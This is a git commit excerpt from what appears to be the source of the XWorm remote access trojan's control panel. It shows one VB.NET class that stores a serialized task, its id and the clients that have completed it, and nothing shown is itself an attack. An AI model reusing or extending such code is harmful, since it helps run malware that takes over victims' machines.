initial commit

This commit is contained in:
i2p
2026-08-27 11:22:34 -06:00
commit 5983c713b1
2676 changed files with 529190 additions and 0 deletions
+11
View File
@@ -0,0 +1,11 @@
Public Class XWormTask
Public msgPack As Byte()
Public id As String
Public doneClient As List(Of String)
Public Sub New(ByVal _msgPack As Byte(), ByVal _id As String)
msgPack = _msgPack
id = _id
doneClient = New List(Of String)()
End Sub
End Class